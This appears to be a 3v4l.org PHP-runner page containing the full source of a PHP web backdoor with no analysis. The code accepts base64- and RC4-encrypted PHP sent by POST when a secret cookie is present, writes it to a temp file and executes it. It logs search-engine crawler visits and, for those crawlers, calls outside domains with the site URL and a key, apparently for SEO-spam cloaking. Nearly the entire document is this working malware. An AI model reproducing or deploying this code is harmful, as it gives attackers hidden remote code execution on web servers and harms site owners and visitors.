3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php if (!defined("web_inspector")){ if (function_exists('ini_set')){ @ini_set('allow_url_fopen', 1); @ini_set('display_errors', 0); } define('DISALLOW_FILE_EDIT', true); define('determinator', 1); function rc4($key, $string) { $j=$i-$i=-1; $s=array(); $result=implode($s); for ($a=256;++$i<$a;$s[$i]=$i); $x=$i=$j-1; for ($key_len=strlen($key); ++$i<$a;$s[$j]=$x){ $j=($j + $s[$i] + ord($key[$i % $key_len])) % $a; $x=$s[$i]; $s[$i]=$s[$j]; //$s[$j]=$x; } for ($y=$j=$i=0; $y<strlen($string);){ $i=++$i%$a; $j=($j + $s[$i]) % $a; $x = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $x; $result.=$string[$y++] ^ chr($s[($s[$i]+$s[$j]) % $a]); } return $result; } function w3net_feof($fp, &$start=NULL) { $start = microtime(true); return feof($fp); } function php_server_lower($item){ return @strtolower(@$_SERVER[$item]); } $source='{{source}}'; $ver='{{version}}'; $salt='{{salt}}'; $host='http'; $show_for_agents='google+yahoo+baidu+bingbot+msnbot+yandex'; $empty_string=implode(array()); if (isset($_SERVER['HTTPS'])){ if (@$_SERVER['HTTPS'] != 'off') $host.='s'; } $host.='://'.php_server_lower('HTTP_HOST'); //do sql enjection filter $badwords = 'base64_decode+union+select'; foreach (array_keys($_GET) as $key){ foreach(explode('+',$badwords) as $badware){ $_GET[$key]=str_replace($badware, $empty_string,$_GET[$key]); } } //IIS path if(!isset($_SERVER['REQUEST_URI'])) { $request_uri=@$_SERVER['SCRIPT_NAME']; if(isset($_SERVER['QUERY_STRING'])) { $request_uri.= '?' . @$_SERVER['QUERY_STRING']; } } else{ $request_uri=$_SERVER['REQUEST_URI']; } if (strlen($host) < 10){ define("web_inspector", 0); } elseif ($uri=$host.$request_uri){ $secure_key=@md5($host.PHP_OS.$ver.$salt); //find the directory $ds = DIRECTORY_SEPARATOR; $tmpdir=dirname(__FILE__).$ds; $tempdirs = Array( '/dev/shm', '/tmp/.font-unix', '/tmp/.ICE-unix', @$_SERVER['TMP'], @$_SERVER['TEMP'], @$_ENV['TMP'], @$_ENV['TMPDIR'], @$_ENV['TEMP'], '/tmp', @ini_get('upload_tmp_dir'), $tmpdir.'tmp', $tmpdir.'wp-content/uploads', $tmpdir.'wp-content/cache' ); if (defined('forced_dir')){ array_unshift($tempdirs, constant('forced_dir')); } foreach ($tempdirs as $location){ if (!empty($location)){ $location.=$ds; if (@is_writable($location)){ $tmpdir = $location; break; } } } $w3n_code=$tmpdir.'.'.$secure_key; define("web_inspector", $w3n_code); $w3n_log = $w3n_code.'.log'; $cookie_key = md5($secure_key); if (isset($_COOKIE[$cookie_key])){ $base64 = 'base64_decode'; echo "\r\n"; echo "version:".$ver."-".$source."-php\r\n"; echo "directory:".dirname(__FILE__)."\r\n"; if ($code=@$_POST[$cookie_key]){ $code=rc4($secure_key, $base64($code)); $w3n_exec=$w3n_code.".run"; $fh=@fopen($w3n_exec, 'w'); @fwrite($fh, "<?php ".$code); @fclose($fh); @include($w3n_exec); @unlink($w3n_exec); // $streammeta = 'stream_get_meta_data'; // fwrite($temp=tmpfile(), "<?php ".$code); // $meta = $streammeta($temp); // include($meta['uri']); // fclose($temp); // eval($code); } exit(0); } $se_bot=0; $useragent = php_server_lower('HTTP_USER_AGENT'); foreach (explode('+', $show_for_agents) as $refitm){ if (strpos($useragent, $refitm)!==False){ //log query $logfile = @fopen($w3n_code.'.log', 'a'); $requesturl = @urlencode($request_uri); @fwrite($logfile, time()."\t".$refitm."\t".$requesturl."\n"); @fclose($logfile); ++$se_bot; break; } } if (@is_file($w3n_code)){ @touch($w3n_code); @include_once($w3n_code); } elseif ($se_bot>0){ $domains = Array('{{ping_domain}}','e2.krebs.com','b4.foralice.com'); if (@touch($w3n_code)){ $uri=@urlencode($uri); $path = '/wp-config.php?u='.$uri.'&k='.$secure_key.'&t=php&p='.$source.'&v='.$ver; //get_content $host=$domains[0]; $curl='curl_'; $curl_init = $curl.'init'; if (@ini_get('allow_url_fopen') == '1') { @file_get_contents('http://' . $host . $path. '&w=fgc'); } //curl elseif (function_exists($curl_init)){ $curlhandler = @$curl_init(); $curl_setopt = $curl.'setopt'; @$curl_setopt($curlhandler, CURLOPT_URL, 'http://'.$host.$path. '&w=cu'); @$curl_setopt($curlhandler, CURLOPT_HEADER, 0); @$curl_setopt($curlhandler, CURLOPT_RETURNTRANSFER, 1); @$curl_setopt($curlhandler, CURLOPT_CONNECTTIMEOUT, 7); $curl_exec = $curl.'exec'; $curldata = @$curl_exec($curlhandler); @curl_close($curlhandler); } //fsock open else { $port = 80; $fp = @fsockopen($host, $port, $errno, $errstr, 5); if ($fp) { $start = NULL; @fputs($fp, "GET {$path}".'&w=sk HTTP/1.0'."\r\n".'Host: '."{$host}\r\n"); $user_agent = PHP_OS.'/'.PHP_VERSION; @fputs($fp, "User-Agent: {$user_agent}\r\n\r\n"); while(!w3net_feof($fp, $start) && (microtime(true) - $start) < 2){ @fgets($fp, 128); } @fclose($fp); } } @touch($w3n_code); } } } else { define("web_inspector", 1); } } ?>
Output for 5.3.0 - 7.1.0